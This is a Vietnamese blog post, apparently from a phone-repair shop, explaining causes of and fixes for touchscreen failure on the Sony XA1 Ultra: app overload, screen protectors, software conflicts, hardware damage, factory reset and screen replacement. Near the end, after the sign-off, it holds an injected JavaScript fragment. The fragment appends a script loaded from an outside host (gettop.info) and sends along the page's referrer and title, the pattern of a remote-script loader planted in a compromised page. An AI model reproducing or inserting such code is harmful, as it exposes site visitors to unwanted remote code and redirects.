Giải pháp cho chiếc Sony XA1 Ultra bị mất cảm ứng

Ngày đăng: 3:34 chiều

Bạn sẽ gặp nhiều khó khăn khi sử dụng các chức năng thú vị và hữu ích của Sony XA1 Ultra, nếu như Sony XA1 Ultra bị mất cảm ứng.

Do đâu mà Sony XA1 Ultra bị mất cảm ứng? Khắc phục sự cố này như thế nào? Đây chắc hẳn là những câu hỏi mà bạn sẽ đặt ra cho mình khi không may phải gặp phải sự cố mất cảm ứng trên Sony XA1 Ultra. Để giải đáp những câu hỏi này, bạn hãy cùng tham khảo những thông tin sau đây.

Sony XA1 Ultra bi mat cam ung

Bạn đang cảm thấy khó chịu bởi lỗi Sony XA1 Ultra bị mất cảm ứng?

Do đâu mà Sony XA1 Ultra mất cảm ứng

Giống như các lỗi hư hỏng khác, việc Sony XA1 Ultra mất cảm ứng cũng có thể do lỗi khách quan của nhà sản xuất. Dù vậy, thực tế cho thấy, trường hợp này rất ít khi xảy ra. Trái lại, những vấn đề liên quan đến cảm ứng của chiếc điện thoại này thường xuất phát từ sự chủ quan, bất cẩn của chính những ai đang sở hữu nó:

➡ Người dùng cài tải quá nhiều ứng dụng nặng, để máy chứa quá nhiều dữ liệu lớn, tạo ra áp lực cho RAM, khiến máy không thể phản hồi thao tác. Đồng thời, việc sử dụng đồng thời nhiều ứng dụng hay sử dụng máy trong thời gian liên tục mà không cho máy nghỉ ngơi cũng có thể gây ra tình trạng tương tự.

Sony XA1 Ultra mat cam ung

Tình trạng mất cảm ứng trên XA1 Ultra do nguyên nhân nào gây ra?

➡ Miếng dán màn hình/kính cường lực không vừa vặn với cấu tạo của Sony XA1 Ultra, gây ra những cản trở nhất định cho việc sử dụng điện thoại của người dùng.

➡ Sony XA1 Ultra bị xung đột phần mềm khi có ứng dụng không tương thích với hệ điều hành được cài đặt. Tình trạng này có thể khiến chức năng cảm ứng cũng bị ảnh hưởng theo.

➡ Điện thoại của bạn bị hư hỏng về phần cứng do các sự cố ngấm nước, va chạm mạnh, rơi rớt hay do máy phải tiếp xúc với môi trường độc hại thường xuyên.

Làm gì khi Sony XA1 bị mất cảm ứng?

➡ Nếu máy của bạn bị lỗi cảm ứng ngay từ khi mua về thì bạn cần liên hệ với trung tâm bảo hành của Sony để được hưởng các chính sách giải quyết phù hợp.

➡ Tháo bỏ miếng dán bảo vệ hoặc kính cường lực có trên màn hình, lau sạch màn hình cho Sony XA1 Ultra rồi thử lại chức năng cảm ứng. Nếu lúc này, cảm ứng có thể hoạt động trở lại bình thường thì chứng tỏ nguyên nhân gây mất cảm ứng là do các phụ kiện màn hình gây ra. Bạn nên thay mới hoặc tháo bỏ chúng hoàn toàn để sự cố không còn tiếp diễn.

Sony XA1 Ultra bi mat cam ung

Khắc phục Sony XA1 Ultra bị mất cảm ứng như thế nào?

➡ Nếu vẫn có thể sử dụng chức năng cảm ứng ở mức độ nào đó, hãy vào Cài đặt => Sao lưu và đặt lại => Cài lại dữ liệu của nhà sản xuất => Đặt lại điện thoại để đưa máy về trạng thái cài đặt gốc. Bạn lưu ý biện pháp này sẽ xóa hết dữ liệu có trong điện thoại mà không thể phản hồi. Vì vậy, hãy back up dữ liệu trước khi áp dụng.

➡ Cuối cùng, thay màn hình Sony XA1 Ultra là dịch vụ mà bạn phải cần đến khi các biện pháp trên không đem lại tác dụng. Khi cần đến dịch vụ này, bạn nhớ lựa chọn một trung tâm thật đáng tin cậy nhé.

Chúc các bạn khắc phục sự cố Sony XA1 Ultra bị mất cảm ứng thành công!

 d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Tin liên quan

Thay mặt kính Sony Z3 giá rẻ thay lấy ngay
Tháng Mười Một 25, 2016 oanhoanh